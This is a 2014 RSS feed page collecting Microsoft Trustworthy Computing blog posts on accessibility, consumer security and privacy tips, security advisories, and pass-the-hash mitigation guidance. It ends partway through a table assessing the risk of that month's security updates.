Trustworthy Computing Security and Privacy Blogs./blogs/default.aspxThis page consolidates and features blogs from Microsoft’s Trustworthy Computing (TwC) group, The team charged with working to deliver more secure, private and reliable computing experiences to customers and the globe. Drop by to read about Microsoft’s long-term vision and strategy, for computing privacy and security.On the ADA’s Anniversary Work Remains to Make Workplaces Accessiblehttp://blogs.msdn.com/b/accessibility/archive/2014/07/25/on-the-ada-s-anniversary-work-remains-to-make-workplaces-accessible.aspxFri, 25 Jul 2014 14:31:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10545062Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10545062http://blogs.msdn.com/b/accessibility/archive/2014/07/25/on-the-ada-s-anniversary-work-remains-to-make-workplaces-accessible.aspx#comments<p>Twenty-four years ago, the Americans with Disabilities Act (ADA) promised a new generation of workers opportunities to join the U.S. workforce. But as we celebrate the anniversary of the act Saturday, a <a href="http://www.help.senate.gov/newsroom/press/release/?id=8c890e1c-27fd-4599-b040-0e2631a96212">report</a>offers a sobering reminder that many members of this ADA generation still face high barriers when looking for a job.</p> <p>Today, more than two-thirds of Americans with disabilities are not in the workforce and employment of workers with disabilities hasn&rsquo;t improved since the act was passed in 1990, according to the <a href="http://www.help.senate.gov/newsroom/press/release/?id=8c890e1c-27fd-4599-b040-0e2631a96212">congressional report released last year</a> by Sen. Tom Harkin, D-Iowa. 
The report proposed a bold plan to help the ADA generation make easier transitions from school to work.</p>...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/25/on-the-ada-s-anniversary-work-remains-to-make-workplaces-accessible.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10545062" width="1" height="1"> What you need to know about privacy and security in OneDrivehttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/24/what-you-need-to-know-about-privacy-and-security-in-onedrive.aspxThu, 24 Jul 2014 15:24:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543978Eve Blakemore0http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10543978http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/24/what-you-need-to-know-about-privacy-and-security-in-onedrive.aspx#comments<p><a href="https://onedrive.live.com/about/en-in/">OneDrive</a>&nbsp;is free online storage that's built into&nbsp;Windows&nbsp;8.1&nbsp;and&nbsp;Windows&nbsp;RT&nbsp;8.1. Add files from your PC to OneDrive,&nbsp;and then easily access your photos, music, documents, and other files on all the devices you use.</p> <h1>How you can help protect your privacy and security in OneDrive</h1> <p class="para"><strong>Create a strong password for your Microsoft Account.&nbsp;</strong>You sign into OneDrive with your <a href="http://www.microsoft.com/security/online-privacy/microsoft-account.aspx">Microsoft Account</a>. Here is some basic guidance on how to create a strong password for that account. Different sites have different rules for passwords that they&rsquo;ll accept, but this guidance should work anywhere you need to create a password:</p> <ul> <li><strong>Length.</strong> Make your passwords at least eight (8) characters long.</li> <li><strong>Complexity.</strong> Include a combination of at least three (3) uppercase and/or lowercase letters, punctuation, symbols, and numerals. 
The more variety of characters in your password, the better.</li> <li><strong>Variety.</strong> Don't use the same password for everything. Cybercriminals can steal passwords from websites that have poor security and then use those same passwords to target more secure environments, such as banking websites. <a href="http://go.microsoft.com/fwlink/p/?LinkID=248678">Check the strength of your password</a>.</li> </ul> <p class="para"><strong>Manage who can view or edit your OneDrive files. </strong>By default, your OneDrive files are available to you, although you can choose to share photos, documents, and other files. To share files or folders, right-click them and choose how you want to share them.</p> <p class="para"><strong>Add security info to your Microsoft account.</strong> You can add information like your phone number, an alternate email address, and a security question and answer to your account. That way, if you ever forget your password or your account gets hacked, we can use your security info to verify your identity and help you get back into your account. Go to the&nbsp;<a href="http://go.microsoft.com/fwlink/p/?LinkID=263780">Security info page</a>.</p> <p class="para"><strong>Use two-step verification.</strong> This helps protect your account by requiring you to enter an extra security code whenever you sign in on a device that isn&rsquo;t trusted. 
For more information about two-step verification, see&nbsp;<a href="http://windows.microsoft.com/en-us/windows/two-step-verification-faq">Two-step verification: FAQ</a>.</p> <p class="para"><strong>Back up your&nbsp;OneDrive&nbsp;files.</strong> For details about using File History in Windows, see&nbsp;<a href="http://windows.microsoft.com/en-us/windows-8/set-drive-file-history">Set up a drive for File History</a>.</p> <p class="para">For more information about how Microsoft helps keep your files safe in the cloud, see <a href="http://www.microsoft.com/security/online-privacy/onedrive.aspx">Privacy in OneDrive</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543978" width="1" height="1">privacysecurityMicrosoftcloud securityOneDrive IBM Names Frances West as Chief Accessibility Officerhttp://blogs.msdn.com/b/accessibility/archive/2014/07/23/ibm-names-frances-west-as-chief-accessibility-officer.aspxWed, 23 Jul 2014 18:30:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10544676Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10544676http://blogs.msdn.com/b/accessibility/archive/2014/07/23/ibm-names-frances-west-as-chief-accessibility-officer.aspx#comments<p>For more than 20 years, Microsoft and IBM have worked side-by-side on digital inclusion efforts and the development of technology for people with disabilities. So, I am excited to congratulate my longtime colleague, Frances West, who was recently named IBM&rsquo;s first Chief Accessibility Officer (CAO). 
I have known Frances for years as the Director of the IBM Research Human Ability and Accessibility Center where she has served to advance accessible solutions produced by IBM and worked with myself and others as an advocate for effective accessibility policies around the world.</p>...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/23/ibm-names-frances-west-as-chief-accessibility-officer.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10544676" width="1" height="1">IAAPIBMCAO Is Windows Security Center real or rogue?http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/22/is-windows-security-center-real-or-rogue.aspxTue, 22 Jul 2014 15:31:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543260Eve Blakemore5http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10543260http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/22/is-windows-security-center-real-or-rogue.aspx#comments<p>A reader writes:</p> <p><em>What kind of warnings from Windows Security Center are real, and what should I do about them?</em></p> <p><a href="http://windows.microsoft.com/en-us/windows-vista/using-windows-security-center">Windows Security Center</a> is a feature that was introduced in Windows XP Service Pack 2 and was also included in Windows Vista. 
(<a href="http://windows.microsoft.com/en-us/windows7/what-is-action-center">Action Center</a> replaced Windows Security Center in Windows 7.)</p> <p>Security Center checks the security status on your computer, including:</p> <ul> <li> <p>Firewall settings</p> </li> <li> <p>Windows automatic updating</p> </li> <li> <p>Antivirus software settings</p> </li> <li> <p>Internet security settings</p> </li> <li> <p>User Account Control settings</p> </li> </ul> <p>If Security Center detects a security problem, it displays a notification and puts a Security Center icon&nbsp;&nbsp;in the notification area.&nbsp;Click the notification or double-click the Security Center icon <a href="http://blogs.msdn.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/5584.security-center-icon.png"><img src="http://blogs.msdn.com/resized-image.ashx/__size/10x10/__key/communityserver-blogs-components-weblogfiles/00-00-00-72-21/5584.security-center-icon.png" alt="Security Center Icon" width="10" height="13" /></a>&nbsp;to open Security Center and get information about how to fix the problem.</p> <h1>Is Windows Security Center a virus?</h1> <p>In the years since Security Center was introduced, cybercriminals have created several different kinds of malware that look like Security Center or have the same name. If you have this malware on your computer, it might lure you into a fraudulent transaction, steal your personal information, or slow down your computer.&nbsp;This kind of malware is called &ldquo;rogue security software.&rdquo; <a href="http://www.microsoft.com/security/pc-security/antivirus-rogue.aspx">Learn how to spot and avoid these fake virus alerts</a>.</p> <h1>How do I know if the warnings are real?</h1> <ol> <li>If you think a warning looks suspicious, the first thing you can do is run antivirus software on your computer, which might let you know if you have a virus. 
Learn more <a href="http://www.microsoft.com/security/pc-security/protect-os.aspx">about antivirus software for your operating system</a>.</li> <li>To check your knowledge of real security warnings and fake security warnings, and to learn how to help protect your computer and personal information, <a href="https://www.facebook.com/msftmmpc/app_236330836495399">take our quiz</a>.</li> </ol><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543260" width="1" height="1">virusmalwarerogue security softwareautomatic updatingAutomatic Updatesfirewalluser account control 9 ways to stay safe online this summerhttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/17/9-ways-to-stay-safe-online-this-summer.aspxThu, 17 Jul 2014 16:30:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543258Eve Blakemore1http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10543258http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/17/9-ways-to-stay-safe-online-this-summer.aspx#comments<p>Summer is in full swing. Here are our best safety and security tips for the season.</p> <ol> <li> <p><strong>Don&rsquo;t broadcast vacation plans on your social networking sites.</strong>&nbsp;If you&rsquo;re leaving your home unoccupied and at risk for potential burglary, you might want to wait to post your vacation photographs until you return home. <a href="http://www.microsoft.com/security/online-privacy/email.aspx">Get more tips for email and social networking safety</a>.</p> </li> <li> <p><strong>Limit who knows your location.</strong> Before you go on vacation, take a few minutes to adjust settings for sharing your location on your social networking sites and any apps on your smartphone. If you have kids who go online, make sure they know this, too. 
For more information, see&nbsp;<a href="http://www.microsoft.com/security/online-privacy/location-services.aspx">Use location services more safely</a>.</p> </li> <li> <p><strong>Set computer and device rules for when you&rsquo;re not around. </strong>If your kids are old enough to stay home alone when they&rsquo;re not at school, make sure you talk to them about Internet safety. <a href="http://go.microsoft.com/?linkid=9838905">Download our tip sheet for pointers to jump-start&mdash;or continue&mdash;online safety conversations</a>.</p> </li> <li> <p><strong>Learn how to use parental controls.</strong> All Microsoft products include built-in privacy controls and safeguards that put you in charge of your children&rsquo;s entertainment experiences and allow you to customize how personal information is, or is not, shared. <a href="http://www.microsoft.com/en-gb/about/family-safety/safer-families">Get step-by-step guidance on how to switch on safety settings across Microsoft technology and devices at home</a>.</p> </li> <li> <p><strong>Stay safe when playing games online.</strong> If your children&rsquo;s summer sport of choice is <a href="http://www.microsoft.com/security/online-privacy/xbox.aspx">the Xbox, Xbox One, Kinect</a>, or other online or console game, learn about <a href="http://support.xbox.com/en-US/xbox-one/security/core-family-safety-features">the core family safety features of Xbox One</a> and <a href="http://www.microsoft.com/security/family-safety/gaming-about.aspx">find other ways to help kids play it safe</a>.</p> </li> <li> <p><strong>Update your software on your laptop or tablet.</strong> Before you go on vacation, make sure all your software is updated, to help prevent problems caused by hackers. 
If your laptop is still running Windows XP, read about the <a href="http://windows.microsoft.com/en-us/windows/end-support-help">end of support for Windows XP</a>.</p> </li> <li> <p><strong>Check the security level of public Wi-Fi networks before you use them.</strong> Choose the most secure connection&mdash;even if that means you have to pay for access. A password-protected connection (ideally one that is unique for your use) is better than one without a password. Both&nbsp;<a href="http://windows.microsoft.com/en-US/windows7/How-do-I-know-if-a-wireless-network-is-secure">Windows 7</a>&nbsp;and&nbsp;<a href="http://windows.microsoft.com/en-US/windows-8/how-know-network-safe-to-connect">Windows 8</a>&nbsp;can help you evaluate and minimize network security risks.</p> </li> <li> <p><strong>Avoid typing sensitive information on your laptop using an unsecured wireless connection.</strong> If possible, save your financial transactions for after your summer vacation on a secured home connection. For more information, see <a href="http://windows.microsoft.com/en-us/windows/know-online-transaction-secure#1TC=windows-7">How to know if a financial transaction is secure.</a></p> </li> <li> <p><strong>Watch out for suspicious messages from your friends on vacation asking for money. </strong>This is a common scam cybercriminals use when they&rsquo;ve hacked into someone&rsquo;s account. Find a different way to contact your friend. 
<a href="http://www.microsoft.com/security/online-privacy/phishing-scams.aspx">Learn more about scam email messages</a>.</p> </li> </ol><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543258" width="1" height="1">fraudid theftspamchild safetymalwarefamilymonthly security updatesautomatic updatingsecurityMicrosoft Updateonline safetycybersecuritycybersafetyantispywareMicrosoftgeolocationWindows 8location services Access Israel Is Working Towards True Integration of All People with Disabilitieshttp://blogs.msdn.com/b/accessibility/archive/2014/07/17/access-israel-is-working-towards-true-integration-of-all-people-with-disabilities.aspxThu, 17 Jul 2014 08:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10543062Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10543062http://blogs.msdn.com/b/accessibility/archive/2014/07/17/access-israel-is-working-towards-true-integration-of-all-people-with-disabilities.aspx#comments<p>One of the best parts of my job is that I get to collaborate with inspiring organizations around the world that are working to create a more accessible and inclusive society. Last month, I was at the second annual conference of <a href="http://www.aisrael.org/?CategoryID=2110&amp;ArticleID=44873">Access Israel</a>, a non-profit group working to improve quality of life for people with disabilities. 
Over two days, I learned about the incredible range of accessibility work happening across that country.</p>...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/17/access-israel-is-working-towards-true-integration-of-all-people-with-disabilities.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10543062" width="1" height="1"> New Story Features Microsoft Project that Uses Your Skin as a Keypadhttp://blogs.msdn.com/b/accessibility/archive/2014/07/15/new-story-features-microsoft-project-that-uses-your-skin-as-a-keypad.aspxTue, 15 Jul 2014 18:40:06 GMT91d46819-8472-40ad-a661-2c78acb4018c:10542606Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10542606http://blogs.msdn.com/b/accessibility/archive/2014/07/15/new-story-features-microsoft-project-that-uses-your-skin-as-a-keypad.aspx#commentsScientists and doctors are merging technology and the human body in breakthroughs that help people with a wide range of abilities, including a project by Microsoft researchers that is developing keypads for your skin, the Las Vegas Sun reports . 
Today...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/15/new-story-features-microsoft-project-that-uses-your-skin-as-a-keypad.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10542606" width="1" height="1"> Dynamics CRM Online for Governments Compliant with FedRAMPhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/07/15/dynamics-crm-online-for-governments-compliant-with-fedramp.aspxTue, 15 Jul 2014 17:47:45 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:da57ba2d-8b40-40ff-a19c-f768ef0b9decTrusted Cloud Team0<p style="margin:0in 0in 0pt;"><strong><span lang="EN" style="color:#333333;font-family:&#39;Segoe UI&#39;,&#39;sans-serif&#39;;font-size:10.5pt;">By Adrienne Hall, General Manager, Trustworthy Computing</span></strong></p> <p>Yesterday at Microsoft&#39;s worldwide partner conference, my colleague Curt Kolcun, Vice President, U.S. Public Sector announced additional updates that make Microsoft&rsquo;s cloud &ndash; which spans infrastructure, data, productivity, mobility and more &ndash;an increasingly compelling solution for government customers.&nbsp;</p> <p>Curt announced several things.&nbsp;The first is that Dynamics CRM Online joins Office 365 and Azure in providing additional cloud services for government, in compliance with FedRAMP.&nbsp;Available in early 2015, this will allow customers to use their existing Microsoft investments on-premises and in the cloud through hybrid capabilities including integration with Azure and Office 365 government community clouds.&nbsp;<span style="color:#0066dd;"><a href="/b/trustworthycomputing/archive/2014/07/15/dynamics-crm-online-for-governments-compliant-with-fedramp.aspx">Read more &gt;&gt;</a></span></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/15/dynamics-crm-online-for-governments-compliant-with-fedramp.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634616&AppID=9044&AppType=Weblog&ContentType=0" width="1" 
height="1">Dynamics CRM OnlineAzureOffice 365FedRAMPCloud Computing Microsoft takes on world’s worst cybercriminalshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/15/microsoft-takes-on-world-s-worst-cybercriminals.aspxTue, 15 Jul 2014 15:49:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10542267Eve Blakemore4http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10542267http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/15/microsoft-takes-on-world-s-worst-cybercriminals.aspx#comments<p>Microsoft recently took legal action against a group of cybercriminals suspected of spreading malicious software to millions of unsuspecting computer users.</p> <p>These social media&ndash;savvy cybercriminals have not only spread the <a href="http://www.microsoft.com/security/resources/malware-whatis.aspx">malware</a> themselves, but they&rsquo;ve also promoted their malicious tools across the Internet, offering step-by-step instructions to completely control millions of unsuspecting victims&rsquo; computers to conduct illicit crimes.</p> <p>For more information on the legal action, see <a href="http://blogs.microsoft.com/blog/2014/06/30/microsoft-takes-on-global-cybercrime-epidemic-in-tenth-malware-disruption/">Microsoft takes on global cybercrime epidemic in tenth malware disruption</a>.</p> <h1>To help protect yourself against cybercrime</h1> <ul> <li>Keep your operating system and other software updated.</li> <li>Use antivirus software (and keep it updated).</li> <li>Don&rsquo;t open suspicious email messages, links, or attachments.</li> </ul> <p>Get more guidance at <a href="http://www.microsoft.com/security/pc-security/protect-pc.aspx">How to boost your malware defense and protect your PC</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10542267" width="1" height="1">botnetmonthly security updatesautomatic updatingAutomatic UpdatesMicrosoft Updateantivirus 
softwarecybersecuritycybersafetycybercriminalsmalicious softwareMicrosoft WindowsDigital Crimes UnitMicrosoft July 2014 Security Bulletin Webcast and Q&Ahttp://blogs.technet.com/b/msrc/archive/2014/07/14/july-2014-security-bulletin-webcast-and-q-amp-a.aspxMon, 14 Jul 2014 20:30:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:365fbc49-0788-4ddc-a5dd-eb87b7b15fe0Dustin C. Childs0<p>Today we published the July 2014 Security Bulletin webcast <a href="http://blogs.technet.com/b/msrc/p/july2-2014-security-bulletin-q-a.aspx">questions and answers page</a> along with the webcast replay. We answered eight questions on air, with the majority focusing on the update for <a href="https://technet.microsoft.com/library/security/ms14-037">Internet Explorer</a>. The transcript also includes a question we did not have time to answer on the air.</p> <p>Here is the video replay:</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/hbniTR475GE?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/hbniTR475GE?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>We invite you to join us for the next scheduled webcast on Wednesday, August 13, 2014, at 11 a.m. PDT (UTC -7), when we will go into detail about the August bulletin release and answer your bulletin deployment questions live on the air. There&rsquo;s no longer a need to register before this event to attend. 
You can find details on how to view the webcast and get a calendar reminder <a href="http://technet.microsoft.com/en-us/security/dn756352">here</a>.</p> <p>I look forward to seeing you next month.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634575&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsBulletin WebcastCustomer QuestionsInternet Explorer (IE) #TBT : Be Safer–Run as Standard Userhttp://blogs.technet.com/b/security/archive/2014/07/10/tbt-be-safer-run-as-standard-user.aspxThu, 10 Jul 2014 21:15:12 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:f26d0a36-0604-4c94-ab32-44a0676a39a3Jeff Jones - MSFT0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3634407http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3634407http://blogs.technet.com/b/security/archive/2014/07/10/tbt-be-safer-run-as-standard-user.aspx#commentsFor #ThrowBackThursday, I thought it would be good to pull out an old but goodie. The original post is from back before the blog evolved into the Microsoft Security Blog and was still called &ldquo;Jeff Jones Security Blog&rdquo;. I&rsquo;m including...(<a href="http://blogs.technet.com/b/security/archive/2014/07/10/tbt-be-safer-run-as-standard-user.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634407&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">WindowsTipsSecurityPersonal Technology Trouble installing updates? 
Might be a case of bad timinghttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/10/trouble-installing-updates-might-be-a-case-of-bad-timing.aspxThu, 10 Jul 2014 16:10:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10540612Eve Blakemore4http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10540612http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/10/trouble-installing-updates-might-be-a-case-of-bad-timing.aspx#comments<p>This week we released security updates for the Windows operating system. If you have automatic updating turned on, your updates have probably already been downloaded and installed for you.</p> <p><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get updates automatically</a></p> <p>Even if you have automatic updating turned on, you might see an error message telling you that your updates were not installed.</p> <p>Some errors are simply a matter of bad timing. Sometimes your updates don&rsquo;t install because the website is too busy or you&rsquo;re using a slow connection. 
You can usually fix these problems by trying to install the updates again.</p> <p>For more information about solving connection problems, see:</p> <ul> <li><a href="http://windows.microsoft.com/en-us/windows-8/how-solve-connection-problems-windows-update">How to solve connection problems with Windows Update</a></li> <li><a href="http://windows.microsoft.com/en-us/windows/troubleshoot-problems-installing-updates#1TC=windows-8">Troubleshoot problems with installing updates</a></li> </ul><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10540612" width="1" height="1">updatesmonthly security updatesautomatic updatingAutomatic UpdatessecurityMicrosoft Updateonline safetypatch TuesdaycybersafetyMicrosoft WindowsMicrosofttroubleshooting updates Security Advisory 2982792 released, Certificate Trust List updatedhttp://blogs.technet.com/b/msrc/archive/2014/07/10/security-advisory-2982792-released-certificate-trust-list-updated.aspxThu, 10 Jul 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:dfcdfb5e-f2a7-4f6b-acfc-f4397ccbe72cDustin C. Childs0<p>Today, we are updating the Certificate Trust List (CTL) for all supported releases of Microsoft Windows to remove the trust of mis-issued third-party digital certificates. These certificates could be used to spoof content and perform phishing or man-in-the-middle attacks against web properties.</p> <p>With this update, most customers will be automatically protected against this issue and will not need to take any action. If you do not have automatic updates enabled, or if you are on Windows Server 2003, please see the <a href="https://technet.microsoft.com/en-us/library/security/2982792.aspx">Security Advisory 2982792</a> for recommended actions. 
Additionally, the <a href="http://www.microsoft.com/emet">Enhanced Mitigation Experience Toolkit (EMET) 4.1</a>, and newer versions, help to mitigate man-in-the-middle attacks by detecting untrusted or improperly issued SSL certificates through the Certificate Trust feature.</p> <p>For more information, please see <a href="https://technet.microsoft.com/en-us/library/security/2982792.aspx">Microsoft Security Advisory 2982792</a>.</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634363&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">AdvisorySecurity Advisory Diversity and Collaboration Will Drive IAAP’s Successhttp://blogs.msdn.com/b/accessibility/archive/2014/07/10/diversity-and-collaboration-will-drive-iaap-s-success.aspxThu, 10 Jul 2014 15:29:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10541093Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10541093http://blogs.msdn.com/b/accessibility/archive/2014/07/10/diversity-and-collaboration-will-drive-iaap-s-success.aspx#commentsThis blog post was written by Rob Sinclair, Microsoft&rsquo;s Chief Accessibility Officer. 
Rob is responsible for the company's worldwide strategy to develop software and services that make it easier for people of all ages and abilities to see, hear,...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/10/diversity-and-collaboration-will-drive-iaap-s-success.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10541093" width="1" height="1"> The Initial Impact of Federal Rules to Encourage Employment of People with Disabilitieshttp://blogs.msdn.com/b/accessibility/archive/2014/07/09/the-initial-impact-of-federal-rules-to-encourage-employment-of-people-with-disabilities.aspxWed, 09 Jul 2014 22:39:56 GMT91d46819-8472-40ad-a661-2c78acb4018c:10541089Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10541089http://blogs.msdn.com/b/accessibility/archive/2014/07/09/the-initial-impact-of-federal-rules-to-encourage-employment-of-people-with-disabilities.aspx#commentsThe federal government implemented new rules this spring that encourage the hiring of people with disabilities. 
A story in the Pittsburgh Post-Gazette explores the early impact of these new rules, which set a goal for both federal contractors and subcontractors...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/09/the-initial-impact-of-federal-rules-to-encourage-employment-of-people-with-disabilities.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10541089" width="1" height="1"> Security, Transparency and Privacyhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/07/08/security-transparency-and-privacy.aspxTue, 08 Jul 2014 19:03:51 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:cfcdecf6-b71a-474d-94cc-7772ad2b6414Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong><br /><br />Last week my colleague, Matt Thomlinson, shared some <a target="_blank" href="/b/microsoft_on_the_issues/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx">important updates</a> about Microsoft&rsquo;s efforts to enhance protections for our customers&rsquo; data and to increase transparency regarding our engagements with governments around the world.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/07/08/security-transparency-and-privacy.aspx">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/08/security-transparency-and-privacy.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3634283&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">CustomersBrendon LynchBig DataTrustworthy ComputingMicrosoftDataPrivacy New Strategies and Features to Help Organizations Better Protect Against Pass-the-Hash Attacks http://blogs.technet.com/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspxTue, 08 Jul 2014 17:09:20 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:94bd342a-50b1-4deb-ae4c-cf80d5258abfMicrosoft Security 
Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3634186http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3634186http://blogs.technet.com/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspx#comments<p>Posted by <strong>Matt Thomlinson</strong>, Vice President, Microsoft Security</p> <p>Today, we released new guidance to&nbsp;help our&nbsp;customers address credential theft, called <a href="http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating-Pass-the-Hash-Attacks-and-Other-Credential-Theft-Version-2.pdf">Mitigating Pass-the-Hash and Other Credential Theft, version 2</a>. The paper encourages IT professionals to &ldquo;assume breach&rdquo; to highlight the need for the use of holistic planning strategies and features in Microsoft Windows to become more resilient against credential theft attacks. This paper builds on our <a href="/b/security/archive/2012/12/06/new-guidance-to-mitigate-determined-adversaries-favorite-attack-pass-the-hash.aspx">previously released </a>guidance and mitigations for Pass-the-Hash (PtH) attacks.&nbsp;</p> <p>Given that organizations must continue to operate after a breach, it is critical for them to have a plan to minimize the impact of successful attacks on their ongoing operations. Adopting an approach that assumes a breach will occur, ensures that organizations have a holistic plan in place before an attack occurs. A planned approach enables defenders to close the seams that attackers are aiming to exploit.</p> <p>The guidance also underscores another important point - that technical features alone may not prevent lateral movement and privilege escalation. In order to substantially reduce credential theft attacks, organizations should consider the attacker mindset and use strategies such as identifying key assets, implementing detection mechanisms, and having a breach recovery plan. 
These strategies can be implemented in combination with Windows features to provide a more effective defensive approach, and are aligned to the well-known <a href="http://www.nist.gov/cyberframework/index.cfm">National Institute of Standards and Technology (NIST) Cybersecurity Framework</a>. <a href="/b/security/archive/2014/07/08/new-strategies-and-features-to-help-organizations-better-protect-against-pass-the-hash-attacks.aspx">Read more</a></p> <br />Tags: PTH, Guidance, version 2, Pass-the-Hash and other credential theft<br /> <strong>Assessing risk for the July 2014 security updates</strong><br />http://blogs.technet.com/b/srd/archive/2014/07/08/assessing-risk-for-the-july-2014-security-updates.aspx<br />Tue, 08 Jul 2014 17:03:17 GMT<br />SRD Blog Author<br /> <p>Today we released six security bulletins addressing 29 unique CVEs. Two bulletins have a maximum severity rating of Critical, three have maximum severity Important, and one is Moderate. 
We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max exploitability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-037">MS14-037</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses 23 remote code execution issues and one lower severity Security Feature Bypass vulnerability.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-038">MS14-038</a> <p>(Windows Journal)</p> </td> <td>Victim opens malicious .JNT file or navigates with Explorer to a WebDAV share under attacker control where a malicious .JNT file is automatically rendered.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-040">MS14-040</a> <p>(AFD.sys)</p> </td> <td>Attacker running code at low privilege runs 